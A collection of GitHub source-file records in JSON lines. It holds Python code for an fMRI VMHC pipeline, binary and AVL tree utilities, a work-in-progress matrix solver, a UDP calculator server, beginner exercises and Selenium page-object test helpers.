this has to be 3 instead of default 0 because it is a 4D file\n apply_ants_xfm_vmhc.inputs.inputspec.input_image_type = 3\n\n\n\n ## copy and L/R swap file\n copy_and_L_R_swap = pe.Node(interface=fsl.SwapDimensions(),\n name='copy_and_L_R_swap')\n copy_and_L_R_swap.inputs.new_dims = ('-x', 'y', 'z')\n\n ## caculate vmhc\n pearson_correlation = pe.Node(interface=preprocess.TCorrelate(),\n name='pearson_correlation')\n pearson_correlation.inputs.pearson = True\n pearson_correlation.inputs.polort = -1\n pearson_correlation.inputs.outputtype = 'NIFTI_GZ'\n\n z_trans = pe.Node(interface=preprocess.Calc(),\n name='z_trans')\n z_trans.inputs.expr = 'log((1+a)/(1-a))/2'\n z_trans.inputs.outputtype = 'NIFTI_GZ'\n\n z_stat = pe.Node(interface=preprocess.Calc(),\n name='z_stat')\n z_stat.inputs.outputtype = 'NIFTI_GZ'\n\n NVOLS = pe.Node(util.Function(input_names=['in_files'],\n output_names=['nvols'],\n function=get_img_nvols),\n name='NVOLS')\n\n generateEXP = 
pe.Node(util.Function(input_names=['nvols'],\n output_names=['expr'],\n function=get_operand_expression),\n name='generateEXP')\n\n\n smooth = pe.Node(interface=fsl.MultiImageMaths(),\n name='smooth')\n\n\n if use_ants == False:\n\n vmhc.connect(inputNode, 'rest_res',\n smooth, 'in_file')\n vmhc.connect(inputnode_fwhm, ('fwhm', set_gauss),\n smooth, 'op_string')\n vmhc.connect(inputNode, 'rest_mask',\n smooth, 'operand_files')\n vmhc.connect(smooth, 'out_file',\n nonlinear_func_to_standard, 'in_file')\n vmhc.connect(inputNode, 'standard_for_func',\n nonlinear_func_to_standard, 'ref_file')\n vmhc.connect(inputNode, 'fnirt_nonlinear_warp',\n nonlinear_func_to_standard, 'field_file')\n ## func->anat matrix (bbreg)\n vmhc.connect(inputNode, 'example_func2highres_mat',\n nonlinear_func_to_standard, 'premat')\n vmhc.connect(nonlinear_func_to_standard, 'out_file',\n copy_and_L_R_swap, 'in_file')\n vmhc.connect(nonlinear_func_to_standard, 'out_file',\n pearson_correlation, 'xset')\n\n elif use_ants == True:\n\n # connections for ANTS stuff\n\n # functional apply warp stuff\n\n vmhc.connect(inputNode, 'rest_res',\n smooth, 'in_file')\n vmhc.connect(inputnode_fwhm, ('fwhm', set_gauss),\n smooth, 'op_string')\n vmhc.connect(inputNode, 'rest_mask',\n smooth, 'operand_files')\n\n vmhc.connect(smooth, 'out_file',\n apply_ants_xfm_vmhc, 'inputspec.input_image')\n\n vmhc.connect(inputNode, 'ants_symm_initial_xfm',\n collect_transforms_vmhc, 'inputspec.linear_initial')\n\n vmhc.connect(inputNode, 'ants_symm_rigid_xfm',\n collect_transforms_vmhc, 'inputspec.linear_rigid')\n\n vmhc.connect(inputNode, 'ants_symm_affine_xfm',\n collect_transforms_vmhc, 'inputspec.linear_affine')\n\n vmhc.connect(inputNode, 'ants_symm_warp_field',\n collect_transforms_vmhc, 'inputspec.warp_file')\n\n ## func->anat matrix (bbreg)\n vmhc.connect(inputNode, 'example_func2highres_mat',\n fsl_to_itk_vmhc, 'inputspec.affine_file')\n\n vmhc.connect(inputNode, 'brain', fsl_to_itk_vmhc,\n 'inputspec.reference_file')\n\n vmhc.connect(inputNode, 'mean_functional', fsl_to_itk_vmhc,\n 'inputspec.source_file')\n\n vmhc.connect(fsl_to_itk_vmhc, 'outputspec.itk_transform', \n collect_transforms_vmhc, 'inputspec.fsl_to_itk_affine')\n\n vmhc.connect(inputNode, 'standard_for_func',\n apply_ants_xfm_vmhc, 'inputspec.reference_image')\n\n vmhc.connect(collect_transforms_vmhc, \\\n 'outputspec.transformation_series', \\\n apply_ants_xfm_vmhc, 'inputspec.transforms')\n\n vmhc.connect(apply_ants_xfm_vmhc, 'outputspec.output_image',\n copy_and_L_R_swap, 'in_file')\n\n vmhc.connect(apply_ants_xfm_vmhc, 'outputspec.output_image',\n pearson_correlation, 'xset')\n\n\n vmhc.connect(copy_and_L_R_swap, 'out_file',\n pearson_correlation, 'yset')\n vmhc.connect(pearson_correlation, 'out_file',\n z_trans, 'in_file_a')\n vmhc.connect(copy_and_L_R_swap, 'out_file',\n NVOLS, 'in_files')\n vmhc.connect(NVOLS, 'nvols',\n generateEXP, 'nvols')\n vmhc.connect(z_trans, 'out_file',\n z_stat, 'in_file_a')\n vmhc.connect(generateEXP, 'expr',\n z_stat, 'expr')\n\n if use_ants == False:\n\n vmhc.connect(nonlinear_func_to_standard, 'out_file',\n outputNode, 'rest_res_2symmstandard')\n\n elif use_ants == True:\n\n # ANTS warp outputs to outputnode\n\n vmhc.connect(apply_ants_xfm_vmhc, 'outputspec.output_image',\n outputNode, 'rest_res_2symmstandard')\n\n\n vmhc.connect(pearson_correlation, 'out_file',\n outputNode, 'VMHC_FWHM_img')\n vmhc.connect(z_trans, 'out_file',\n outputNode, 'VMHC_Z_FWHM_img')\n vmhc.connect(z_stat, 'out_file',\n outputNode, 'VMHC_Z_stat_FWHM_img')\n\n\n 
return vmhc\n","repo_name":"ZheweiMedia/DL_experiments","sub_path":"Outdated/Version0_CPAC/vmhc/vmhc.py","file_name":"vmhc.py","file_ext":"py","file_size_in_byte":17052,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"21660368869","text":"# Licensed under MIT License.\n# See LICENSE in the project root for license information.\n\n\"\"\"A simple CLI application.\"\"\"\n\nimport cmd\nfrom typing import Optional\n\nfrom forest import tree_exceptions\nfrom forest.binary_trees import avl_tree\nfrom forest.binary_trees import binary_search_tree\nfrom forest.binary_trees import binary_tree\nfrom forest.binary_trees import red_black_tree\nfrom forest.binary_trees import single_threaded_binary_trees\nfrom forest.binary_trees import double_threaded_binary_trees\nfrom forest.binary_trees import traversal\n\n\nclass cli(cmd.Cmd):\n \"\"\"A CLI for operating tree data structures.\"\"\"\n \n intro = \"Welcome to the Tree CLI. Type help or ? to list available commands.\\n\"\n prompt = \"tree> \"\n \n def __init__(self) -> None:\n cmd.Cmd.__init__(self)\n self._tree: Optional[binary_tree.BinaryTree] = None\n \n def do_build(self, line):\n \"\"\"Build a binary tree.\n \n Options: avl, bst, rb, threaded\n \n Example\n -------\n tree> build avl\n \"\"\"\n try:\n if self._tree is not None:\n print(f\"ERROR: A tree of type {type(self._tree)} already exists.\")\n return\n \n tree_type = self._get_single_arg(line=line).lower()\n if tree_type == \"avl\":\n self._tree = avl_tree.AVLTree()\n elif tree_type == \"bst\":\n self._tree == binary_search_tree.BinarySearchTree()\n elif tree_type == \"rb\":\n self._tree == red_black_tree.RBTree()\n elif tree_type == \"threaded\":\n threaded_type = input(\n \"Please input threaded BST type (left, right, double): \"\n ).lower()\n if threaded_type == \"left\":\n self._tree = single_threaded_binary_trees.LeftThreadedBinaryTree()\n elif threaded_type == \"right\":\n self._tree = single_threaded_binary_trees.RightThreadedBinaryTree()\n elif threaded_type == \"double\":\n self._tree = double_threaded_binary_trees.DoubleThreadedBinaryTree()\n else:\n print(f\"ERROR: {threaded_type} is an invalid threaded type.\")\n else:\n print(f\"ERROR: {tree_type} is an invalid tree type.\")\n except KeyError as error:\n print(error)\n \n def do_search(self, line):\n \"\"\"Search data by a given key.\n \n Example\n -------\n tree> search 3\n \"\"\"\n try:\n key = self._get_key(line=line)\n output = self._tree.search(key=key)\n if output is None:\n print(f\"ERROR: A node with key {key} does not exist.\")\n else:\n print(output.key, output.data)\n except KeyError as error:\n print(error)\n \n def do_insert(self, line):\n \"\"\"Insert a (key, data) pair. 
The key must be an integer.\n \n Example\n -------\n tree> insert 7 data\n \"\"\"\n args = line.split()\n # Note: the `insert` is not included in `args`.\n if len(args) != 2:\n print(\"ERROR: Invalid number of arguments: Two expected.\")\n return\n try:\n key = self._get_key(line=line)\n self._tree.insert(key=key, data=args[1])\n print(f\"(key, data) = ({args[0]}, {args[1]}) has been inserted.\")\n except tree_exceptions.DuplicateKeyError:\n print(f\"ERROR: A node with {key} already exists.\")\n except KeyError as error:\n print(error)\n \n def do_delete(self, line):\n \"\"\"Delete an item by the given key.\n \n Example\n -------\n tree> delete 5\n \"\"\"\n try:\n key = self._get_key(line=line)\n self._tree.delete(key=key)\n print(f\"Key {key} has been removed.\")\n except KeyError as error:\n print(error)\n \n def do_traverse(self, line):\n \"\"\"Traverse the binary tree.\n \n Options: pre, in, post, reverse\n \n Example\n -------\n tree> traverse pre\n \"\"\"\n try:\n arg = self._get_single_arg(line=line).lower()\n \n if isinstance(\n self._tree, single_threaded_binary_trees.LeftThreadedBinaryTree\n ):\n if arg == \"reverse\":\n for item in self._tree.reverse_inorder_traverse():\n print(item)\n else:\n print(f\"ERROR: {arg} is an invalid traversal type for this tree.\")\n elif isinstance(\n self._tree, single_threaded_binary_trees.RightThreadedBinaryTree\n ):\n if arg == \"pre\":\n for item in self._tree.preorder_traverse():\n print(item)\n elif arg == \"in\":\n for item in self._tree.inorder_traverse():\n print(item)\n else:\n print(f\"ERROR: {arg} is an invalid traversal type for this tree.\")\n elif isinstance(\n self._tree, double_threaded_binary_trees.DoubleThreadedBinaryTree\n ):\n if arg == \"pre\":\n for item in self._tree.preorder_traverse():\n print(item)\n elif arg == \"in\":\n for item in self._tree.inorder_traverse():\n print(item)\n elif arg == \"reverse\":\n for item in self._tree.reverse_inorder_traverse():\n print(item)\n else:\n print(f\"ERROR: {arg} is an invalid traversal type for this tree.\")\n elif isinstance(self._tree, red_black_tree.RBTree):\n if arg == \"pre\":\n for item in self._tree.preorder_traverse():\n print(item)\n elif arg == \"in\":\n for item in self._tree.inorder_traverse():\n print(item)\n elif arg == \"post\":\n for item in self._tree.postorder_traverse():\n print(item)\n else:\n print(f\"ERROR: {arg} is an invalid traversal type for this tree.\")\n else:\n # For avl and bst\n if arg == \"pre\":\n for item in traversal.preorder_traverse(tree=self._tree):\n print(item)\n elif arg == \"in\":\n for item in traversal.inorder_traverse(tree=self._tree):\n print(item)\n elif arg == \"post\":\n for item in traversal.postorder_traverse(tree=self._tree):\n print(item)\n elif arg == \"reverse\":\n for item in traversal.reverse_inorder_traverse(tree=self._tree):\n print(item)\n else:\n print(f\"ERROR: {arg} is an invalid traversal type.\")\n except KeyError as error:\n print(error)\n \n def do_display(self, line):\n \"\"\"Display the tree.\"\"\"\n if isinstance(self._tree.root, binary_tree.Node):\n if isinstance(\n self._tree, single_threaded_binary_trees.LeftThreadedBinaryTree\n ) or isinstance(\n self._tree, single_threaded_binary_trees.RightThreadedBinaryTree\n ) or isinstance(\n self._tree, double_threaded_binary_trees.DoubleThreadedBinaryTree\n ):\n self._tree.root.display_keys(self._tree)\n else:\n self._tree.root.display_keys()\n \n def do_destroy(self, line):\n \"\"\"Destroy the existing tree.\"\"\"\n self._tree = None\n print(\"The tree has been 
destroyed.\")\n \n def do_exit(self, line):\n \"\"\"Exit the application.\"\"\"\n print(\"Bye!\")\n raise SystemExit() \n \n def _get_single_arg(self, line):\n # Get only the only argument from the line of input.\n arg = line.split()\n if len(arg) > 1:\n raise KeyError(\"Too many arguments! Only one expected.\")\n return arg[0]\n \n def _get_key(self, line):\n # Get the key of a node from the line of input.\n arg = line.split()\n if len(arg) == 0:\n raise KeyError(\"ERROR: No argument provided!\")\n # str.isdigit() checks if str is made ONLY of digits\n if not arg[0].isdigit():\n raise KeyError(\"ERROR: The key must be an integer!\")\n else:\n return int(arg[0])\n\n\ndef main():\n \"\"\"Entry point for the tree CLI.\"\"\"\n cli().cmdloop()","repo_name":"justyre/jus","sub_path":"ag/forest/bin/tree_cli.py","file_name":"tree_cli.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15767033613","text":"given_matrix = []\r\n\r\n\r\n# Prints the given matrix\r\ndef show_matrix():\r\n for x in given_matrix:\r\n print(x)\r\n\r\n\r\n# gives a row that is multiplied by a given number\r\ndef multiply_row(row, constant):\r\n temp_row = []\r\n for x in row:\r\n temp_row.append(x * constant)\r\n return temp_row\r\n\r\n\r\n# Making the properly sized matrices with default values\r\nnum_rows = int(input(\"How many Rows ?\\n\"))\r\nnum_cols = int(input(\"How many Columns ?\\n\"))\r\ni = num_rows\r\nwhile i > 0:\r\n current_row_given = []\r\n j = num_cols\r\n while j > 0:\r\n current_row_given.append(\"_\")\r\n j -= 1\r\n given_matrix.append(current_row_given)\r\n i -= 1\r\n\r\n\r\n# Assigning values\r\ni = 0\r\nj = 0\r\nwhile i < num_rows:\r\n while j < num_cols:\r\n given_matrix[i][j] = '*'\r\n show_matrix()\r\n given_matrix[i][j] = float(input(\"Highlighted cell value: \"))\r\n j += 1\r\n j = 0\r\n i += 1\r\n\r\n\r\n# Solving\r\n# since dividing introduces a lot of error and it's difficult to store 2 numbers per cell\r\n# only multiply rows in the matrix, divide at the end\r\n\r\n# Getting to EF\r\n\r\n# current_col is the column that has a variable being eliminated\r\ncurrent_col = 0\r\nwhile current_col < num_cols:\r\n operating_row = current_col + 1\r\n coefficient_product = 1\r\n for x in given_matrix:\r\n coefficient_product *= x[current_col]\r\n multiplied_subtract = multiply_row(given_matrix[current_col], (coefficient_product / current_col[current_col]))\r\n while operating_row < len(given_matrix):\r\n # multiplied_row: variable going to 0\r\n multiplied_row = multiply_row(given_matrix[operating_row], (coefficient_product / current_col[operating_row]))\r\n given_matrix[operating_row] = multiplied_row - multiplied_subtract\r\n # ^ check this logic, syntax error ^\r\n operating_row += 1\r\n\r\n current_col += 1\r\n# need to use that to eliminate that col in all other rows\r\n\r\n\r\n# Tests\r\nprint(\"Matrix:\")\r\nshow_matrix()\r\ntest_row = [1.0, 2.0, 3.0]\r\nprint(\"Test row: \", test_row)\r\ntest_row = multiply_row(test_row, 3)\r\nprint(\"Modified row: \", test_row)\r\n","repo_name":"JacobzYan/FunProjects","sub_path":"WIP/MatrixSolver.py","file_name":"MatrixSolver.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22887861736","text":"\n\ndef find_value(head, key):\n if head is None:\n return None\n \n if head.key == key:\n return head.value\n\n if head.left is None and head.right is None:\n 
return\n\n if head.right is None:\n return find_value(head.left, key)\n \n if head.left is None:\n return find_value(head.right, key)\n \n if key < head.key:\n return find_value(head.left, key)\n\n return find_value(head.right, key)\n\n\n\nclass BinaryTree:\n def __init__(self) -> None:\n self.head = None\n\n def search(self, key):\n head = self.head\n return find_value(head, key)\n\n def insert(self, key, value):\n if self.head is None:\n self.head = Node(key, value)\n return self.head\n return insert_node(self.head, key, value)\n\n def delete(self, key):\n self.head = delete_element(self.head, key)\n \n def print_tree(self):\n print(\"==============\")\n self._print_tree(self.head, 0)\n print(\"==============\")\n\n def _print_tree(self, node, lvl):\n if node is not None:\n self._print_tree(node.right, lvl+5)\n\n print()\n print(lvl*\" \", node.key, node.value)\n\n self._print_tree(node.left, lvl + 5)\n\n def height(self):\n return find_height(self.head)\n\n\nclass Node:\n def __init__(self, key, value, left=None, right=None) -> None:\n self.key = key\n self.value = value\n self.left = left\n self.right = right\n \n def __str__(self) -> str:\n return f\"{self.key}: {self.value}\"\n\n\ndef find_height(node):\n if node is None:\n return 0\n \n leftHeight = find_height(node.left)\n rightHeight = find_height(node.right)\n\n if leftHeight > rightHeight:\n return 1 + leftHeight\n return 1 + rightHeight\n\n\nclass AVLNode(Node):\n def __init__(self, *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n \n @property\n def left_height(self):\n return find_height(self.left)\n\n @property\n def right_height(self):\n return find_height(self.right)\n\n\ndef findMinValue(head):\n if head is None:\n return head\n \n if head.left is None:\n return head\n \n return findMinValue(head.left)\n\n\ndef delete_element(head, key):\n if head is None:\n return head\n \n if head.key > key:\n head.left = delete_element(head.left, key)\n return head\n \n if head.key < key:\n head.right = delete_element(head.right, key)\n return head\n\n if head.left is None:\n temp = head.right\n # head = None\n return temp\n \n if head.right is None:\n temp = head.left\n # head = None\n return temp\n \n temp = findMinValue(head.right)\n\n head.key = temp.key\n head.value = temp.value\n head.right = delete_element(head.right, temp.key)\n return head\n\n\ndef insert_node(head, key, value):\n if head is None:\n return AVLNode(key, value)\n \n if head.key == key:\n head.value = value\n return head\n\n if head.key > key:\n head.left = insert_node(head.left, key, value)\n return head\n \n if head.key < key:\n head.right = insert_node(head.right, key, value)\n return head\n\n\ndef resolve_left_imbalance(head):\n left_node = head.left\n\n # LL imbalance\n if left_node.left_height - left_node.right_height >= 0:\n left_right = left_node.right\n left_node.right = head\n head.left = left_right\n\n return left_node\n\n # LR imbalance\n new_head = left_node.right\n new_head_left = new_head.left\n new_head_right = new_head.right\n new_head.left = left_node\n new_head.right = head\n left_node.right = new_head_left\n head.left = new_head_right\n\n return new_head\n\n\ndef resolve_right_imbalance(head):\n right_node = head.right\n\n # RR imbalance\n if right_node.right_height - right_node.left_height >= 0:\n right_node_left = right_node.left\n right_node.left = head\n head.right = right_node_left\n return right_node\n\n # RL imbalance\n new_head = right_node.left\n new_head_left = new_head.left\n new_head_right = new_head.right\n 
new_head.left = head\n new_head.right = right_node\n\n right_node.left = new_head_right\n head.right = new_head_left\n\n return new_head\n\n\ndef find_imbalance(head):\n if head.right_height < 2 and head.left_height < 2:\n return head\n\n if head.left_height - head.right_height == 2:\n head = resolve_left_imbalance(head)\n\n if head.right_height - head.left_height == 2:\n head = resolve_right_imbalance(head)\n \n if head.left is not None:\n head.left = find_imbalance(head.left)\n \n if head.right is not None:\n head.right = find_imbalance(head.right)\n \n return head\n\n\nclass AVLTree(BinaryTree):\n def __init__(self) -> None:\n super().__init__()\n \n def insert(self, key, value):\n if self.head is None:\n self.head = AVLNode(key, value)\n insert_node(self.head, key, value)\n self.head = find_imbalance(self.head)\n\n def delete(self, key):\n super().delete(key)\n if self.head.left_height - self.head.right_height == 2:\n self.head = resolve_left_imbalance(self.head)\n\n if self.head.right_height - self.head.left_height == 2:\n self.head = resolve_right_imbalance(self.head)\n\n\nif __name__ == \"__main__\":\n tree = AVLTree()\n tree.insert(50, 'A')\n tree.insert(15, 'B')\n tree.insert(62, 'C')\n tree.insert(20, 'D')\n tree.insert(25, 'D')\n tree.insert(2, 'E')\n tree.insert(1, 'F')\n tree.insert(11, 'G')\n tree.insert(100, 'H')\n tree.insert(7, 'I')\n tree.insert(6, 'J')\n tree.insert(55, 'K')\n tree.insert(52, 'L')\n tree.insert(51, 'M')\n tree.insert(57, 'N')\n tree.insert(8, 'O')\n tree.insert(9, 'P')\n tree.insert(10, 'R')\n tree.insert(99, 'S')\n tree.insert(12, 'T')\n tree.print_tree()\n # Wyswietl klucz: wartosc\n tree.search(10)\n tree.delete(50)\n tree.delete(52)\n tree.delete(11)\n tree.delete(57)\n tree.delete(1)\n tree.delete(12)\n tree.insert(3, 'AA')\n tree.insert(4, 'BB')\n tree.delete(7)\n tree.delete(8)\n tree.print_tree()\n # Wyswietl klucz: wartosc\n","repo_name":"djmmatracki/AlgorithmsAndDataStrutures","sub_path":"AVLTrees/AVL_trees.py","file_name":"AVL_trees.py","file_ext":"py","file_size_in_byte":6287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10359323792","text":"from socket import *\nimport re\nimport random\n#assign port number\nserverPort = 12000\n#UDP socket creation\nserverSocket = socket(AF_INET, SOCK_DGRAM)\n#bind port to socket\nserverSocket.bind(('', serverPort))\nprint (\"The server is ready to receive\\n\")\nwhile True:\n #message recieved in format \"n[operation]n [probability of dropping packet in decimal format]\"\"\n messagercv, clientAddress = serverSocket.recvfrom(2048)\n #split up message to extract parts\n rcvdecarr = messagercv.split(\" \")\n\n if(len(rcvdecarr) == 2):\n #in index 1 that is the probability of dropping the packetr decimal\n rcvdec = rcvdecarr[1]\n #delete probability of dropping the packet from the array because you already stored it\n rcvdecarr.pop(1)\n #turn array now with only the numbers and operation code in it back into a string to be processed for calculation\n message = ''.join(rcvdecarr)\n #convert string decimal to decimal\n isfloat = True\n #only processed if decimal formal is valid\n try:\n decimalrcv = float(rcvdec)\n except ValueError:\n isfloat = False\n #make sure value is float\n randompick = 0\n if(isfloat == True):\n #[float(x.strip(' \"')) for x in rcvdec]\n #deal with entering values over 1.0 ie: more than 100% chance of package dropping\n if(decimalrcv > 1.0):\n decimalrcv = 1.0\n #convert to percent\n dropzero = decimalrcv * 100\n 
#100%-probability of dropping paacket = probability of not dropping a packet\n dropone = 100-dropzero\n #make array of (probability of dropping)* #0s and (probability of not dropping)*#1s\n my_list = [1] * int(dropone) + [0] * int(dropzero)\n #pick random item from list\n randompick = random.choice(my_list)\n #bellow what you would do if 50% probability of dropping packets\n #randompick = int(random.randint(0, 1))\n #if you picked one packet was not dropped you may processed\n #if value not float ensure loop doesnt execute\n else:\n modifiedMessage = -1\n print(\"!!!!!!!!!!incorrect decimal!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\"+ \"-1 \\n\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n if(randompick == 1):\n print (\"-->> At Server receved message is: '\" + message.decode() + \"'\")\n print (\" -->> clientAddress is: \" , str(clientAddress[0]) + \"/\" + str(clientAddress[1]) )\n splitmsg = re.split(\"([+-/*])\", message.replace(\" \", \"\"))\n #i used penalties to keep track of number or operation errors in client message\n penalties = 0\n #if the length of the array is more than 3 there is an issue its not in format number operator number\n if(not(len(splitmsg)==3)):\n penalties = penalties + 1\n print(\"!!!!!!!!!!invalid input!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n else:\n #number(not a number) operator number\n if((splitmsg[0]).isdigit() == False):\n penalties = penalties + 1\n print(\"!!!!!!!!!!invalid first input not correct length!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\"+ \"-1 \\n\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n #number operator number(not a number)\n if((splitmsg[2]).isdigit() == False):\n penalties = penalties + 1\n print(\"!!!!!!!!!!invalid second input!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\"+ \"-1 \\n\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n #number operator(not an operator) number\n if(not(splitmsg[1] == '-' or splitmsg[1] == '+' or splitmsg[1] == '*' or splitmsg[1] == '/')):\n penalties = penalties + 1\n print(\"!!!!!!!!!!invalid operation input!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\"+ \"-1 \\n\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n\n #message input violates no restrictions above\n if(penalties == 0):\n operator = splitmsg[1]\n #if subtract\n if operator == '-' :\n modifiedMessage = str(int(splitmsg[0]) - int(splitmsg[2]))\n print (\"<<-- At Server modified message to send back: '\" + modifiedMessage + \"'\\n\"+ \"status code 200\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(str(modifiedMessage+\" 200\"), clientAddress)\n #if add\n if operator == '+' :\n modifiedMessage = str(int(splitmsg[0]) + int(splitmsg[2]))\n print (\"<<-- At Server modified message to send back: '\" + modifiedMessage + \"'\\n\"+ \"status code 200\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n 
serverSocket.sendto(str(modifiedMessage+\" 200\"), clientAddress)\n #if multiply\n if operator == '*' :\n modifiedMessage = str(int(splitmsg[0]) * int(splitmsg[2]))\n print (\"<<-- At Server modified message to send back: '\" + modifiedMessage + \"'\\n\"+ \"status code 200\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(str(modifiedMessage+\" 200\"), clientAddress)\n #if divide but not zero\n if ((operator == '/') and (not (int(splitmsg[2]) == 0)) ):\n modifiedMessage = str(int(splitmsg[0]) / int(splitmsg[2]))\n print (\"<<-- At Server modified message to send back: '\" + modifiedMessage + \"'\\n\"+ \"status code 200\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(str(modifiedMessage+\" 200\"), clientAddress)\n #if divide by zero then not valid operation\n if((operator == '/') and (int(splitmsg[2]) == 0)):\n modifiedMessage = -1\n print(\"!!!!!!!!!!divide by 0!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\"+ \"-1 \\n\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n else:\n modifiedMessage = -1\n print(\"!!!!!!!!!!incorrect format!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\"+ \"-1 \\n\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n","repo_name":"artarazavi/UDP-TCP-servers","sub_path":"UDPServer.py","file_name":"UDPServer.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74564807930","text":"# Author : Pavankumar Hegde\n# Question : Swap Two Numbers\n# Question Link : https://www.codingninjas.com/codestudio/guided-paths/basics-of-python/content/118790/offering/1461386?leftPanelTab=0\n# Solution \n\n'''\n Time complexity: O(1)\n Space complexity: O(1).\n'''\n\ndef swap(a, b):\n temp = 0\n # Store the value of a in temp.\n temp = a\n # Make a equal to b.\n a = b\n # Make b equal to temp.\n b = temp\n \n return a, b","repo_name":"hegdepavankumar/Coding_Ninjas_CodeStudio_Answers","sub_path":"Python_Programs/Question3.py","file_name":"Question3.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"70614980731","text":"P1 = input()\nid_1, unit_1, price_1 = P1.split()\n\nP2 = input()\nid_2, unit_2, price_2 = P2.split()\n\nid_1=int(id_1)\nunit_1=int(unit_1)\nprice_1=float(price_1)\n\nid_2=int(id_2)\nunit_2=int(unit_2)\nprice_2=float(price_2)\n\nMedia = (unit_1*price_1) + (unit_2*price_2)\nformat_float = \"{:.2f}\".format(Media)\nprint(\"VALOR A PAGAR: R$ \"+str(format_float))\n","repo_name":"hasibkyau/Samsung_Job_Preperation","sub_path":"beecrowd/1_Beginner/Python/1010_Simple_Calculator.py","file_name":"1010_Simple_Calculator.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5287059861","text":"import datetime\nimport pandas as pd\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom .RepeatTransaction import RepeatTransaction\nfrom functional_tests.TestCase import wait_for\n\nstrptime = 
datetime.datetime.strptime\n\nclass HomePage:\n\n def __init__(self, driver, server_url=None, start=None, end=None):\n\n self.driver = driver\n self.server_url = server_url\n\n if start is not None and end is not None:\n url = '{}/home?start={}&end={}'.format(self.server_url, start, end)\n self.driver.get(url)\n \n self.balance_chart = BalanceChart(driver)\n self.transaction_form = TransactionForm(driver)\n self.menu = Menu(driver)\n self.transaction_list = TransactionList(driver)\n self.repeat_transactions_list = RepeatTransactionsList(driver)\n self.date_selector = DateSelector(driver.find_element_by_id('date-selector'))\n self.week_forward_button = driver.find_element_by_id('week-forward-button')\n self.week_backward_button = driver.find_element_by_id('week-backward-button')\n self.date_range = self.get_date_range()\n self.transactions_tab = driver.find_element_by_id('transactions-tab')\n self.repeat_transactions_tab = driver.find_element_by_id('repeat-transactions-tab')\n \n def create_transaction(self, update=True, *args, **kwargs):\n self.transaction_form.create_transaction(*args, **kwargs)\n if update == True:\n self.__init__(self.driver)\n\n def get_balances(self):\n values = [(b.date, b.balance) for b in self.balance_chart.bars]\n df_balances = pd.DataFrame(values, columns=['date', 'balance'])\n df_balances = df_balances.set_index('date')\n df_balances.index = pd.to_datetime(df_balances.index)\n return df_balances\n \n def move_date_range_forward(self, days=7):\n if days == 7:\n self.week_forward_button.click()\n else:\n raise Exception('unknown days attribute: {}'.format(days))\n\n def move_date_range_backward(self, days=7):\n if days == 7:\n self.week_backward_button.click()\n else:\n raise Exception('unknown days attribute: {}'.format(days))\n\n def get_date_range(self):\n start_input = self.driver.find_element_by_css_selector('#date-selector #start-input')\n end_input = self.driver.find_element_by_css_selector('#date-selector #end-input')\n start = strptime(start_input.get_attribute('value'), '%Y-%m-%d').date()\n end = strptime(end_input.get_attribute('value'), '%Y-%m-%d').date()\n return [start, end]\n\n def show_repeat_transactions_view(self):\n self.repeat_transactions_tab.click()\n WebDriverWait(self.driver, 120).until(\n EC.visibility_of_element_located((By.ID, 'repeat-transactions'))\n )\n\n def show_transactions_view(self):\n self.transactions_tab.click()\n WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.ID, 'transactions'))\n )\n\n def get_repeat_transactions(self):\n rts = []\n class_name = RepeatTransaction.CLASS_NAME\n for e in self.driver.find_elements_by_css_selector('.{}'.format(class_name)):\n rts.append(RepeatTransaction(e, self.driver))\n return rts\n\n def wait_for_repeat_transaction_prompt(self, timeout):\n wait_for(RepeatTransaction.PROMPT_ID, driver=self.driver, timeout=timeout, by='id')\n\n def get_transactions(self):\n return self.transaction_list.get_transactions()\n\n def reload(self):\n self.__init__(self.driver)\n return self\n\nclass TransactionForm:\n\n def __init__(self, driver):\n\n self.driver = driver\n self.element = driver.find_element_by_id('transaction-form')\n css_selector = 